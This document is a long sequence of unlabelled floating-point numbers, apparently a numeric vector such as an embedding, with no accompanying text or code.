-0.014227722771465778, -0.0013281400315463543, -0.016003446653485298, -0.02024180255830288, -0.022404825314879417, -0.01297083031386137, 0.005601206328719854, 0.029361575841903687, 0.0021885992027819157, 0.019467206671833992, -0.009017467498779297, -0.00717962859198451, 0.008688629604876041, -0.007972493767738342, -0.041915878653526306, -0.00998205877840519, 0.004315084777772427, -0.03004848212003708, 0.006945788394659758, 0.020007962360978127, 0.0017620234284549952, -0.005100642330944538, -0.0043260459788143635, 0.04963260889053345, -0.040249764919281006, -0.01058858260512352, -0.0176695603877306, -0.0003039467555936426, 0.0021758112125098705, 0.038934413343667984, 0.0008992804796434939, -0.009960136376321316, -0.0008572622900828719, -0.024421699345111847, -0.01964258775115013, -0.03352685645222664, -0.0032847258262336254, 0.033789925277233124, 0.005597552750259638, -0.03133460506796837, 0.02274097129702568, -0.03846673294901848, 0.020329494029283524, 0.004848532844334841, -0.03998669609427452, -0.018794916570186615, -0.027695463970303535, -0.03855442255735397, -0.039343636482954025, -0.03133460506796837, 0.03150998428463936, 0.024845534935593605, -0.018473384901881218, -0.03376069664955139, 0.0011755956802517176, -0.0026836830656975508, 0.011019725352525711, 0.01638343743979931, -0.020124882459640503, -0.0025375329423695803, 0.0210017841309309, 0.038262125104665756, 0.016924193128943443, 0.0011134818196296692, 0.028645439073443413, -0.007840958423912525, 0.02309173159301281, 0.03984054550528526, -0.04068821668624878, -0.03373146802186966, -0.03449144959449768, 0.007928648963570595, 0.0053381361067295074, -0.014183877035975456, -0.02556166984140873, 0.017888784408569336, 0.004991029389202595, -0.00001946766315086279, 0.002490034094080329, -0.014439640566706657, -0.009514378383755684, -0.031129993498325348, -0.023690948262810707, -0.007395200431346893, 0.03186074271798134, -0.01114395260810852, -0.004523348994553089, -0.02170330472290516, -0.0335853174328804, 0.03373146802186966, -0.014410410076379776, 0.004322392400354147, 0.013971959240734577, -0.0013016503071412444, 0.025503210723400116, 0.01986181177198887, -0.03174382448196411, 0.018414925783872604, 0.02009565383195877, -0.028250833973288536, 0.05045105144381523, -0.0047608427703380585, 0.010354741476476192, -0.004315084777772427, 0.0364498607814312, -0.042822010815143585, -0.04293892905116081, -0.01114395260810852, 0.02614627219736576, -0.03338070586323738, -0.03025309182703495, -0.007738653104752302, -0.04808341711759567, 0.023427877575159073, -0.03764829412102699, 0.009989366866648197, 0.0010093498276546597, -0.0249332245439291, 0.01458579022437334, -0.017830325290560722, -0.025254754349589348, 0.0030655006412416697, 0.02563474513590336, 0.028923125937581062, -0.018926450982689857, -0.0185026153922081, 0.012802758254110813, 0.047381896525621414, 0.010720117017626762, 0.06740447133779526, -0.029741566628217697, -0.037092920392751694, -0.004380852449685335, -0.035134509205818176, -0.019394131377339363, 0.01559422630816698, 0.0005220302846282721, -0.016281133517622948, -0.023530183359980583, 0.008944392204284668, -0.0008074798970483243, -0.007570580579340458, 0.021337930113077164, -0.02472861483693123, -0.016924193128943443, 0.014622327871620655, 0.047732654958963394, -0.00704078609123826, -0.05331559479236603, -0.045715782791376114, -0.03171459585428238, -0.031773053109645844, -0.0017117842799052596, 0.019598742946982384, 0.04100974649190903, -0.01638343743979931, -0.03355608507990837, 0.0056925504468381405, -0.032153043895959854, -0.04805418848991394, -0.028294678777456284, 0.01704111322760582, 0.010720117017626762, 0.041915878653526306, 0.01686573401093483, 0.0018451462965458632, 0.008191718719899654, 0.02785622887313366, 0.008315946906805038, -0.025503210723400116, 0.0024882073048502207, -0.008060183376073837, 0.003376069711521268, -0.0005371019942685962, 0.02180561050772667, -0.005878891795873642, -0.005129872355610132, -0.013343513943254948, 0.02563474513590336, 0.027797767892479897, -0.022857891395688057, 0.0009892542148008943, -0.040249764919281006, 0.021688690409064293, 0.005634090397506952, -0.013416588306427002, 0.031042303889989853, 0.008074798621237278, -0.009222078137099743, 0.002756758127361536, -0.030866922810673714, 0.002184945624321699, -0.031831514090299606, 0.00046220002695918083, -0.023939402773976326, -0.01595960184931755, 0.02788545936346054, 0.0207240991294384, -0.00990898348391056, 0.0176257137209177, -0.0020004308316856623, 0.017991090193390846, 0.0032280925661325455, 0.010084363631904125, -0.0022306174505501986, -0.06325380504131317, -0.04130204766988754, 0.003069154219701886, -0.0291423499584198, -0.03130537271499634, 0.0015290965093299747, 0.027666233479976654, 0.024640925228595734, 0.010478969663381577, -0.0671706348657608, 0.04942799732089043, 0.019247982650995255, -0.001648757024668157, -0.013409281149506569, -0.036391399800777435, 0.04141896590590477, -0.025751665234565735, -0.05021721124649048, -0.021571770310401917, -0.029683105647563934, 0.0026215692050755024, -0.015462691895663738, -0.012978138402104378, -0.04843417927622795, 0.00935361348092556, -0.0025101297069340944, 0.03425760939717293, 0.010939342901110649, -0.01430810522288084, 0.004136050585657358, -0.004804688040167093, 0.03834981471300125, 0.024217089638113976, 0.0018095221603289247, 0.01297083031386137, 0.005758318118751049, -0.01926259696483612, -0.006496376357972622, -0.02225867658853531, -0.002658106852322817, -0.018268775194883347, 0.05831393226981163, -0.024977069348096848, 0.0005772932781837881, -0.010237821377813816, 0.020329494029283524, -0.002223310060799122, -0.001239536446519196, 0.006993287242949009, 0.03507604822516441, -0.03004848212003708, 0.05322790518403053, 0.0043260459788143635, 0.010530122555792332, -0.01248122751712799, 0.008944392204284668, 0.03618679195642471, 0.018210316076874733, -0.0031732863280922174, -0.026336267590522766, 0.013591969385743141, 0.008060183376073837, -0.019949503242969513, -0.019627971574664116, 0.004757189191877842, 0.008052876219153404, -0.004804688040167093, 0.011648171581327915, -0.0008371666190214455, -0.006079848390072584, 0.007106553763151169, 0.012269309721887112, -0.027797767892479897, -0.022068681195378304, -0.009974751621484756, 0.0436696819961071, -0.045715782791376114, 0.03338070586323738, 0.025751665234565735, -0.010040518827736378, 0.0010230514453724027, -0.0347837470471859, -0.0002804257092066109, -0.0021575423888862133, -0.004512387327849865, 0.0016834676498547196, 0.004172588232904673, -0.012020854279398918, 0.021937144920229912, -0.021308699622750282, -0.004716997966170311, 0.04267586022615433, -0.006832521874457598, -0.05805085971951485, 0.0263654962182045, -0.021820224821567535, 0.01992027275264263, -0.02089947834610939, -0.026380112394690514, 0.00838171411305666, -0.007994416169822216, -0.011575096286833286, 0.02879158966243267, -0.014300797134637833, -0.011648171581327915, 0.0027494507376104593, 0.036771390587091446, -0.030194632709026337, 0.023588642477989197, -0.00038067559944465756, 0.022726356983184814, -0.030019251629710197, -0.02462630905210972, 0.020957939326763153, -0.0061675384640693665, 0.007833651266992092, 0.016427282243967056, 0.018341850489377975, -0.03305917605757713, 0.034199148416519165, 0.03022386133670807, -0.00543313380330801, -0.02037333883345127, -0.013876961544156075, -0.013920807279646397, 0.01936490274965763, -0.009324382990598679, 0.018283391371369362, 0.006459839176386595, -0.036040641367435455, -0.009828601032495499, -0.0142934899777174, -0.015082701109349728, 0.057495489716529846, -0.01936490274965763, -0.024889379739761353, -0.0075632729567587376, -0.02541552111506462, -0.001898125745356083, -0.009521685540676117, -0.0019785084296017885, -0.019145676866173744, -0.008074798621237278, 0.01853184588253498, 0.027622388675808907, 0.02629242092370987, -0.011545865796506405, -0.028016993775963783, -0.015638072043657303, 0.02329634316265583, 0.008681322447955608, -0.0007969753351062536, -0.03285456448793411, 0.009594760835170746, -0.008776320144534111, 0.016924193128943443, 0.02051948942244053, 0.036420632153749466, -0.009002852253615856, 0.00042474904330447316, 0.016953423619270325, 0.014395794831216335, 0.008147873915731907, -0.006532914005219936, 0.041360508650541306, 0.06068156287074089, -0.01631036214530468, -0.016880348324775696, -0.030545393005013466, -0.01246661227196455, 0.003686638781800866, 0.009602067992091179, 0.03568987920880318, -0.03776521235704422, -0.017918014898896217, 0.01281737256795168, -0.001844232901930809, 0.016953423619270325, -0.012678530067205429, -0.010895498096942902, 0.0007293808739632368, 0.005210254807025194, -0.009806678630411625, -0.010442432016134262, -0.0029650223441421986, 0.014410410076379776, -0.011019725352525711, 0.015798836946487427, -0.009799371473491192, 0.006744831800460815, -0.0033578008878976107, 0.03323455527424812, -0.016982654109597206, 0.004406428430229425, -0.0013290534261614084, 0.00346010597422719, 0.0033139558508992195, -0.005436787381768227, 0.016631893813610077, 0.035456039011478424, 0.026906251907348633, 0.010771269910037518, 0.0017501487163826823, 0.0018835107330232859, 0.005871584638953209, 0.00036674566217698157, -0.012422767467796803, -0.020914094522595406, 0.006456185132265091, 0.00542582618072629, -0.01234238501638174, -0.0025777241680771112, 0.003096557455137372, 0.02646780200302601, 0.010325511917471886, -0.0010367530630901456, 0.03077923320233822, 0.018312619999051094, 0.008593631908297539, 0.02816314436495304, -0.04109743610024452, 0.021118704229593277, 0.009317075833678246, -0.030340781435370445, 0.017464948818087578, 0.007994416169822216, -0.01568191684782505, -0.0029485803097486496, -0.03276687487959862, -0.02312096208333969, -0.02430477924644947, -0.040951285511255264, 0.0014267913065850735, -0.011692016385495663, 0.005089680664241314, -0.011626249179244041, -0.0011280968319624662, 0.008754396811127663, -0.026833176612854004, -0.04217894747853279, 0.00977014098316431, -0.00689463596791029, -0.06471531093120575, 0.04328969120979309, 0.00043548192479647696, -0.001503520179539919, -0.026175500825047493, 0.006123693659901619, -0.008842087350785732, 0.01465886551886797, -0.011085492558777332, -0.03276687487959862, 0.020534103736281395, -0.0353391207754612, -0.0035258736461400986, 0.000027460253477329388, -0.03118845261633396, 0.005093334708362818, -0.022273290902376175, 0.01145817618817091, 0.006657141726464033, 0.0024407084565609694, -0.01986181177198887, 0.024991685524582863, 0.008191718719899654, -0.009090542793273926, 0.020811788737773895, 0.015082701109349728, 0.011173183098435402, 0.012225464917719364, -0.015477306209504604, 0.005623129196465015, 0.002563109155744314, -0.006828868295997381, 0.025576286017894745, -0.034579139202833176, 0.003840096527710557, -0.009514378383755684, -0.006109078414738178, -0.029960792511701584, -0.03551449999213219, -0.0037049076054245234, 0.011312025599181652, -0.024246318265795708, -0.009258615784347057, 0.02173253521323204, 0.010471662506461143, 0.012744298204779625, -0.013862347230315208, 0.010537429712712765, 0.009580145590007305, 0.04872647672891617, 0.009536300785839558, 0.01898491196334362, 0.0007581542013213038, -0.013160825707018375, 0.022507131099700928, 0.008060183376073837, -0.008637476712465286, -0.030720772221684456, 0.020256418734788895, -0.009214770048856735, -0.01885337568819523, -0.02545936591923237, -0.020300263538956642, 0.012020854279398918, -0.010069749318063259, -0.014037727378308773, 0.03232842683792114, 0.030106941238045692, -0.020943325012922287, 0.015433461405336857, -0.011655478738248348, -0.006094463635236025, -0.027213167399168015, -0.0062698437832295895, -0.029230041429400444, 0.037882134318351746, -0.004424697253853083, 0.02336941845715046, -0.011713938787579536, -0.020227188244462013, 0.007428084034472704, -0.0038802879862487316, 0.01923336647450924, -0.012196234427392483, -0.003218958154320717, 0.03975285589694977, -0.008732474409043789, -0.0016971692675724626, 0.031977664679288864, -0.0324745737016201, 0.0058752382174134254, 0.005272368434816599, 0.04250048100948334, -0.0018561076140031219, 0.034725289791822433, 0.007362316362559795, -0.01638343743979931, -0.017274953424930573, -0.029931562021374702, -0.006964057218283415, -0.03946055471897125, 0.014198492281138897, -0.012517765164375305, 0.016471127048134804, -0.024012478068470955, 0.042617399245500565, -0.010288974270224571, 0.00026375544257462025, 0.0346960574388504, -0.005228523630648851, -0.004300469532608986, -0.0075340429320931435, -0.0165149737149477, 0.012064699083566666, -0.0013984747929498553, -0.010661656968295574, 0.029127735644578934, 0.027359317988157272, 0.002564936177805066, 0.020197957754135132, -0.018093395978212357, -0.028002379462122917, 0.02266789600253105, 0.009623991325497627, 0.005254099611192942, 0.0006923865876160562, 0.02597089111804962, 0.015564996749162674, -0.002223310060799122, -0.03434529900550842, 0.038759034126996994, -0.018283391371369362, -0.002641664817929268, -0.0700351744890213, 0.0010303589515388012, -0.013752734288573265, -0.023690948262810707, -0.01693880930542946, 0.02092870883643627, 0.0001857706083683297, 0.02288712188601494, 0.008666707202792168, -0.022170985117554665, 0.015448076650500298, -0.0036939464043825865, 0.007643655873835087, -0.010910112410783768, 0.029113121330738068, -0.04527733474969864, -0.011187798343598843, 0.0033523202873766422, -0.012532380409538746, 0.008871316909790039, -0.03004848212003708, 0.0030490586068481207, -0.01438118051737547, 0.007943263277411461, -0.009850523434579372, -0.024290163069963455, -0.03770675137639046, 0.0030326168052852154, 0.04328969120979309, -0.002943099709227681, -0.0065840668976306915, 0.014468870125710964, 0.016982654109597206, -0.005148140713572502, -0.009499763138592243, -0.012137774378061295, -0.05468940734863281, 0.012583532370626926, 0.013708889484405518, 0.02757854387164116, 0.0038072129245847464, -0.009938213974237442, 0.0010796845890581608, 0.017918014898896217, 0.007245396263897419, -0.010647042654454708, -0.029536956921219826, 0.004976414609700441, -0.027797767892479897, -0.054367877542972565, 0.01210123673081398, 0.005769279319792986, 0.07646578550338745, -0.010062441229820251, -0.0037670214660465717, -0.03834981471300125, 0.0000971670524450019, -0.027183938771486282, 0.011377793736755848, -0.008337869308888912, -0.00874708965420723, -0.03262072429060936, 0.01891183666884899, -0.00196937401778996, 0.01034743431955576, 0.027417778968811035, -0.014132725074887276, 0.0028225257992744446, 0.008907854557037354, 0.012196234427392483, -0.00444296607747674, -0.0062990738078951836, -0.01745033450424671, -0.004355276003479958, -0.018195699900388718, 0.03288379684090614, 0.0004768150392919779, -0.006273497361689806, 0.02594166062772274, 0.02879158966243267, -0.005992158316075802, 0.010011289268732071, 0.02674548700451851, -0.02556166984140873, 0.005476979073137045, -0.009149002842605114, -0.020914094522595406, -0.014498100616037846, 0.02016872726380825, -0.017684174701571465, 0.016222672536969185, -0.03542681038379669, 0.011041647754609585, 0.0035112586338073015, -0.0018213968724012375, 0.012196234427392483, -0.009989366866648197, 0.038583654910326004, 0.03250380605459213, -0.03975285589694977, 0.01503885630518198, -0.01603267714381218, -0.02934696152806282, -0.0004290878714527935, 0.014103494584560394, 0.01182355172932148, -0.0008654832490719855, -0.024056322872638702, 0.044108130037784576, 0.020680254325270653, -0.029536956921219826, -0.007672885898500681, -0.011224335990846157, -0.024319393560290337, -0.016456512734293938, 0.039314404129981995, -0.025181680917739868, 0.02041718363761902, -0.007183282636106014, -0.0055829379707574844, 0.015477306209504604, -0.00458911620080471, -0.014264259487390518, 0.012620070017874241, 0.015477306209504604, 0.012210849672555923, -0.016047291457653046, -0.026628566905856133, 0.021367160603404045, 0.010142823681235313, -0.007555965334177017, -0.038583654910326004, 0.0024114784318953753, -0.02705240249633789, -0.012225464917719364, 0.028820820152759552, 0.01022320706397295, -0.0135773541405797, 0.005140833556652069, 0.004004515707492828, 0.022404825314879417, -0.0063794562593102455, 0.02329634316265583, -0.0392267145216465, 0.016120366752147675, 0.01022320706397295, -0.009207462891936302, 0.0364498607814312, 0.004355276003479958, 0.003730484051629901, 0.031246913596987724, 0.031451523303985596, 0.02677471749484539, -0.01936490274965763, -0.006266190204769373, -0.0018926451448351145, -0.014132725074887276, 0.009119772352278233, 0.014322719536721706, -0.02395401895046234, -0.0039022103883326054, 0.0165149737149477, 0.0232232678681612, 0.000041133291233563796, -0.010150131769478321, -0.0010879056062549353, -0.008864009752869606, -0.0014340989291667938, -0.013029290363192558, 0.010084363631904125, -0.012685838155448437, -0.038028281182050705, 0.018283391371369362, 0.03487144038081169, -0.007102899719029665, 0.0014441467355936766, -0.00012297170178499073, -0.008235563524067402, 0.02089947834610939, -0.006690025795251131, 0.008403636515140533, 0.01633959263563156, -0.03244534507393837, 0.015828067436814308, -0.034023769199848175, 0.04621269553899765, -0.03615755960345268, 0.011136645451188087, -0.015243466012179852, -0.012137774378061295, -0.03943132609128952, -0.008162489160895348, 0.01037666480988264, -0.00815518107265234, -0.013760041445493698, -0.0016725064488127828, -0.02263866737484932, 0.009784756228327751, -0.023588642477989197, 0.010354741476476192, 0.00034413806861266494, -0.000970985391177237, 0.01585729792714119, 0.0036811581812798977, 0.018020320683717728, 0.0012422767467796803, -0.0176695603877306, 0.015638072043657303, -0.02573705092072487, -0.00728558748960495, -0.0028901202604174614, 0.016631893813610077, -0.01394272968173027, -0.007526735309511423, -0.003363281488418579, -0.004242009483277798, 0.009806678630411625, -0.026380112394690514, -0.007296549156308174, -0.004516041371971369, -0.023910174146294594, -0.004289508331567049, -0.016368823125958443, -0.019598742946982384, -0.016281133517622948, -0.0241001695394516, 0.007994416169822216, -0.0005293377907946706, -0.0029631953220814466, 0.0029175234958529472, 0.09499762952327728, -0.013146210461854935, 0.010055134072899818, 0.007497505284845829, -0.0015829893527552485, 0.01495116576552391, 0.0018104356713593006, 0.01246661227196455, 0.024713998660445213, -0.04030822589993477, 0.01916029118001461, 0.022755587473511696, -0.01305852085351944, 0.002532052341848612, 0.012305847369134426, 0.0176695603877306, -0.0341406874358654, -0.006657141726464033, 0.03902210295200348, -0.002236098051071167, -0.002318307524546981, 0.00789211131632328, -0.004632961470633745, -0.008279409259557724, 0.03250380605459213, 0.0033267440740019083, 0.004888724535703659, -0.03396530821919441, -0.03946055471897125, -0.012006239034235477, 0.000605609908234328, 0.01197700947523117, -0.01784493960440159, -0.01971566304564476, -0.003964324481785297, 0.022068681195378304, 0.025927046313881874, 0.030165402218699455, -0.0058350469917058945, -0.020884864032268524, -0.0026252230163663626, -0.02062179334461689, -0.024874765425920486, 0.006098117213696241, -0.002996079158037901, 0.004819302819669247, 0.0067338705994188786, 0.002011392265558243, -0.018824147060513496, 0.015272696502506733, -0.014118109829723835, -0.009433995932340622, 0.0072417426854372025, -0.010281667113304138, 0.013708889484405518, -0.00023909259471111, -0.04013284668326378, -0.008776320144534111, 0.020402569323778152, -0.01283198781311512, 0.004055668134242296, 0.016748813912272453, -0.02190791629254818, 0.001857021008618176, 0.013314283452928066, -0.008250178769230843, -0.03539757803082466, 0.002760411938652396, -0.013328898698091507, 0.014527330175042152, 0.011326640844345093, -0.00765096303075552, -0.002239751862362027, -0.0034253953490406275, 0.0017967340536415577, -0.012393536977469921, 0.010647042654454708, 0.016982654109597206, -0.019350286573171616, -0.025079375132918358, 0.009244000539183617, 0.010369356721639633, -0.003052712418138981, 0.0011655478738248348, -0.008681322447955608, 0.044283512979745865, -0.031597673892974854, -0.0173480287194252, -0.00789211131632328, 0.0007828170200809836, -0.019072601571679115, 0.005491593852639198, 0.0179472453892231, -0.0010230514453724027, -0.004727959167212248, 0.026336267590522766, 0.020212573930621147, -0.011955087073147297, -0.010997802950441837, -0.027461623772978783, 0.01648574322462082, 0.010785885155200958, -0.01961335726082325, -0.005561015103012323, -0.014373872429132462, 0.008798242546617985, 0.007395200431346893, 0.0025119567289948463, 0.000288875016849488, -0.009097849950194359, -0.015009625814855099, -0.0042054723016917706, 0.004530656151473522, -0.008586324751377106, -0.009799371473491192, 0.015813451260328293, -0.011428945697844028, -0.004406428430229425, -0.008754396811127663, -0.034725289791822433, -0.01620805822312832, -0.000591451593209058, -0.006160231307148933, -0.03498835861682892, 0.013891576789319515, 0.01034743431955576, 0.02632165141403675, -0.012824680656194687, 0.010939342901110649, -0.007782498374581337, 0.01144356094300747, 0.011896627023816109, 0.014651558361947536, 0.005718126893043518, 0.004786419216543436, -0.029127735644578934, 0.03095461241900921, 0.00653656804934144, -0.010077056474983692, 0.006467146333307028, -0.015243466012179852, 0.02281404659152031, -0.020314877852797508, 0.009653220884501934, 0.015199621208012104, -0.013752734288573265, 0.017611099407076836, -0.0027366625145077705, 0.0047827656380832195, -0.0007700289133936167, 0.012678530067205429, -0.038232892751693726, 0.011801629327237606, 0.02037333883345127, 0.012956216000020504, -0.017640329897403717, 0.0215571541339159, -0.011333948001265526, -0.011852781288325787, 0.020987169817090034, 0.0006147443200461566, 0.005191985983401537, 0.0012139601167291403, -0.026336267590522766, 0.008447481319308281, 0.024918610230088234, -0.009901676326990128, -0.013416588306427002, -0.016851117834448814, 0.009675143286585808, 0.017055729404091835, -0.0005836873897351325, -0.0017245723865926266, -0.00700790248811245, 0.021571770310401917, 0.03680062294006348, 0.009930905885994434, 0.007439045235514641, 0.024640925228595734, -0.021191779524087906, -0.0037925976794213057, -0.007665578275918961, 0.007245396263897419, -0.002800603164359927, -0.01780109480023384, -0.009090542793273926, 0.0009129820391535759, 0.006964057218283415, -0.03300071507692337, 0.012079314328730106, 0.011494713835418224, 0.032708413898944855, -0.01183816697448492, -0.01595960184931755, 0.021761765703558922, -0.01999334804713726, 0.00897362269461155, -0.024290163069963455, 0.015462691895663738, -0.0031276142690330744, -0.0138550391420722, -0.01644189842045307, -0.009499763138592243, 0.016354206949472427, 0.006215037312358618, -0.04092205688357353, -0.02125024050474167, 0.011560481041669846, -0.005608513951301575, 0.005009298212826252, -0.0019182214746251702, -0.01641266793012619, -0.016456512734293938, -0.00862286239862442, 0.04328969120979309, -0.0012340557295829058, -0.025751665234565735, -0.03063308261334896, -0.006510991603136063, 0.0035514498595148325, -0.009244000539183617, -0.014556560665369034, -0.018210316076874733, -0.0005649618688039482, -0.0059848506934940815, 0.0052979448810219765, 0.012802758254110813, -0.020227188244462013, 0.0113558704033494, 0.00890054740011692, -0.031422294676303864, -0.012488534674048424, 0.007091938517987728, 0.014300797134637833, 0.0001016200621961616, -0.01578422263264656, 0.00034276788937859237, -0.005038528237491846, -0.0038875953759998083, 0.016953423619270325, 0.016704969108104706, -0.009528993628919125, -0.015696531161665916, -0.013950036838650703, 0.004008169285953045, -0.00016910035628825426, 0.018736455589532852, 0.02569320611655712, -0.0022342712618410587, 0.002396863419562578, -0.011845474131405354, 0.018692610785365105, -0.0008179844007827342, -0.016734197735786438, 0.0063027273863554, -0.023325571790337563, -0.0055829379707574844, -0.023281726986169815, -0.02326711267232895, -0.020461028441786766, 0.05743702873587608, -0.0263654962182045, -0.010617812164127827, 0.020110268145799637, -0.018999526277184486, 0.013526201248168945, -0.006803291849792004, -0.012590840458869934, 0.0021885992027819157, 0.004629307892173529, -0.006434262730181217, 0.0028079107869416475, -0.008447481319308281, -0.007333086337894201, 0.0034893362317234278, 0.002113697351887822, -0.006496376357972622, -0.01578422263264656, -0.016704969108104706, 0.007249050308018923, -0.0025539747439324856, 0.011180490255355835, 0.03171459585428238, -0.02180561050772667, 0.007965185679495335, -0.006649834103882313, -0.02871851436793804, -0.006225998513400555, -0.0004021414206363261, -0.004505080170929432, 0.009806678630411625, -0.019291827455163002, 0.010310896672308445, -0.028323909267783165, -0.0005019346135668457, 0.01696803793311119, -0.01231315452605486, 0.044838882982730865, 0.008418251760303974, -0.010267051868140697, 0.005137179512530565, 0.013591969385743141, 0.006510991603136063, -0.010625120252370834, 0.010632427409291267, 0.009002852253615856, -0.00816979631781578, 0.001378379063680768, 0.014483485370874405, 0.014213107526302338, -0.0006444310420192778, 0.006390417460352182, -0.029025429859757423, 0.014410410076379776, 0.015550381503999233, -0.010763962753117085, -0.03297148644924164, 0.0140158049762249, -0.04779111593961716, 0.003323090262711048, 0.006313688587397337, -0.010603196918964386, -0.024991685524582863, -0.008133258670568466, -0.012488534674048424, -0.013409281149506569, -0.0008901460678316653, -0.004727959167212248, -0.007062708493322134, -0.011882011778652668, 0.027563927695155144, 0.0038327891379594803, 0.02833852544426918, -0.004691421519964933, -0.010902805253863335, 0.011940471827983856, 0.02722778357565403, -0.006755793001502752, 0.0012221811339259148, 0.01422041468322277, -0.03434529900550842, 0.04112666845321655, -4.852643655794964e-7, -0.013387358747422695, 0.01488539855927229, -0.006240613758563995, 0.016047291457653046, 0.009032082743942738, -0.016193442046642303, -0.028747744858264923, -0.02510860562324524, -0.0013765522744506598, -0.007347701583057642, 0.010296281427145004, 0.013095058500766754, 0.013043905608355999, -0.0008367099217139184, 0.01086626760661602, 0.015272696502506733, -0.010478969663381577, 0.011677401140332222, -0.004505080170929432, -0.014965781010687351, 0.012415459379553795, 0.010077056474983692, -0.024699384346604347, -0.00591908348724246, -0.004574501421302557, 0.006138308439403772, 0.023281726986169815, 0.011122030206024647, 0.0029485803097486496, 0.014600405469536781, -0.00419816467911005, -0.006397725082933903, -0.012795450165867805, 0.02896697074174881, -0.030720772221684456, -0.020285647362470627, 0.029303116723895073, 0.0005288810352794826, 0.01269314531236887, -0.021206393837928772, -0.010676272213459015, 0.018619535490870476, -0.008966314606368542, -0.020022578537464142, -0.024392468854784966, -0.00715405261144042, -0.0018469732021912932, 0.013643121346831322, 0.03928517550230026, 0.016880348324775696, 0.022229446098208427, 0.0033998191356658936, 0.005498901475220919, -0.008878624998033047, 0.0012486708583310246, -0.024874765425920486, -0.014805016107857227, -0.005129872355610132, -0.007979800924658775, -0.0035002974327653646, 0.01648574322462082, 0.022127140313386917, -0.002351191360503435, -0.015418846160173416, -0.016704969108104706, 0.037472911179065704, -0.017377259209752083, -0.0019912964198738337, 0.005710819270461798, -0.004340661223977804, -0.0176695603877306, -0.027900073677301407, 0.0009166357922367752, 0.007994416169822216, 0.05229254439473152, 0.01832723617553711, -0.015111930668354034, -0.005166409537196159, -0.010303589515388012, -0.019379517063498497, -0.012232772074639797, -0.013233901001513004, -0.008294024504721165, -0.004768150392919779, -0.004125089384615421, -0.007464621681720018, -0.000035110304452246055, -0.014330027624964714, 0.005444095004349947, -0.009156309999525547, 0.00949245598167181, 0.027461623772978783, 0.007665578275918961, -0.00692021194845438, -0.01559422630816698, -0.01416926272213459, 0.018926450982689857, 0.008922469802200794, -0.00020860657969024032, 0.003262803191319108, -0.008462096564471722, 0.005743702873587608, -0.002974156755954027, -0.015725761651992798, -0.00824287161231041, -0.010690887458622456, -0.0022287906613200903, 0.020051807165145874, -0.0026215692050755024, 0.024699384346604347, 0.014666172675788403, 0.007256357464939356, 0.005842354614287615, -0.0011344909435138106, -0.0014615020481869578, 0.00947784073650837, -0.0012897755950689316, 0.011012418195605278, -0.007811728399246931, 0.012020854279398918, -0.01123164314776659, 0.018312619999051094, 0.010405894368886948, -0.004826610442250967, -0.0031696325168013573, -0.01467348076403141, -0.00043000129517167807, 0.008922469802200794, -0.0031056918669492006, 0.024056322872638702, -0.004874109290540218, 0.015667302533984184, 0.002828006399795413, -0.007789805997163057, -0.017786480486392975, -0.0034235685598105192, 0.006003119517117739, 0.00816979631781578, 0.030837692320346832, -0.0049033393152058125, -0.01731879822909832, 0.005951967090368271, 0.01328505389392376, 0.008038260973989964, -0.005093334708362818, 0.008652091957628727, -0.011399716138839722, 0.009295152500271797, -0.021674076095223427, 0.010552044957876205, 0.017274953424930573, 0.02412939816713333, 0.0056523592211306095, 0.014863476157188416, 0.02079717442393303, 0.0025411867536604404, -0.01644189842045307, 0.0012459304416552186, -0.007344047538936138, -0.010025903582572937, -0.003544142469763756, 0.008147873915731907, 0.00034276788937859237, -0.015068085864186287, 0.003070981241762638, 0.015901142731308937, -0.012254694476723671, 0.00326828402467072, -0.007979800924658775, -0.011772398836910725, -0.010559352114796638, -0.029960792511701584, 0.002924830885604024, 0.012305847369134426, 0.0030161747708916664, -0.017888784408569336, -0.0003247274726163596, 0.0001250269269803539, 0.0067338705994188786, 0.006825214717537165, -0.009718988090753555, -0.0017894265474751592, 0.015185005962848663, 0.015506536699831486, -0.013504278846085072, 0.0037816364783793688, -0.022302521392703056, 0.011743169277906418, 0.007347701583057642, -0.0010312723461538553, -0.004625653848052025, 0.010997802950441837, -0.0018369253957644105, 0.02427554875612259, -0.013774656690657139, 0.011414330452680588, -0.007570580579340458, -0.003494816832244396, -0.0120500847697258, -0.004534310195595026, 0.018663380295038223, -0.004501426126807928, -0.009536300785839558, 0.012729682959616184, -0.006960403639823198, -0.006233306135982275, 0.01224007923156023, 0.00579850934445858, -0.0066023352555930614, -0.006931173615157604, -0.01603267714381218, 0.0038474041502922773, -0.015360386110842228, -0.017918014898896217, -0.004534310195595026, 0.007994416169822216, -0.002292731311172247, 0.014183877035975456, 0.02347172237932682, 0.029931562021374702, 0.0024023440200835466, 0.01074204035103321, 0.0049325693398714066, -0.004114128183573484, -0.00984321627765894, -0.003136748680844903, -0.011991623789072037, 0.01159701868891716, -0.0033742429222911596, -0.009821293875575066, 0.004768150392919779, 0.006284458562731743, 0.01683650352060795, 0.022872507572174072, -0.01416926272213459, 0.0006859925342723727, 0.00579850934445858, 0.017567254602909088, 0.009119772352278233, -0.017333414405584335, -0.02556166984140873, -0.023413263261318207, -0.0003382007125765085, 0.020007962360978127, -0.015068085864186287, -0.002084467327222228, -0.014118109829723835, 0.006785023026168346, -0.011187798343598843, -0.028075454756617546, 0.03574834018945694, -0.005272368434816599, -0.003308475250378251, -0.020811788737773895, -0.0038912491872906685, -0.006982326041907072, 0.027841614559292793, 0.014278874732553959, 0.02395401895046234, -0.006394071504473686, -0.005729088094085455, -0.004541617352515459, 0.0031915551517158747, 0.020139498636126518, -0.012459305115044117, 0.009718988090753555, -0.009967443533241749, -0.011553173884749413, -0.0019602396059781313, 0.0011481925612315536, -0.004066629335284233, 0.0026964712888002396, -0.01992027275264263, 0.0018131759716197848, -0.006682718172669411, -0.011998931877315044, -0.025810126215219498, 0.0072709727101027966, -0.005104295909404755, 0.019350286573171616, -0.0020186996553093195, 0.006240613758563995, -0.0028079107869416475, -0.007599810604006052, -0.006635219324380159, 0.001998604042455554, 0.01020859181880951, 0.0008659399463795125, -0.00016145029803737998, 0.0066242581233382225, -0.005086027085781097, -0.007431738078594208, 0.01989104226231575, -0.004505080170929432, -0.006620604079216719, -0.029186196625232697, -0.011925856582820415, -0.009287845343351364, -0.00253022531978786, -0.02089947834610939, -0.01807877980172634, -0.03390684723854065, -0.000119546297355555, 0.0013007367961108685, -0.002698298078030348, 0.009156309999525547, 0.03884672373533249, -0.015711147338151932, 0.02138177491724491, -0.0212794691324234, 0.007497505284845829, -0.007460968103259802, -0.022697126492857933, -0.018093395978212357, 0.009974751621484756, 0.007482890505343676, 0.01568191684782505, 0.015462691895663738, 0.014315412379801273, -0.0140158049762249, 0.007066362537443638, 0.0006307294825091958, -0.0077459607273340225, -0.019598742946982384, 0.02274097129702568, 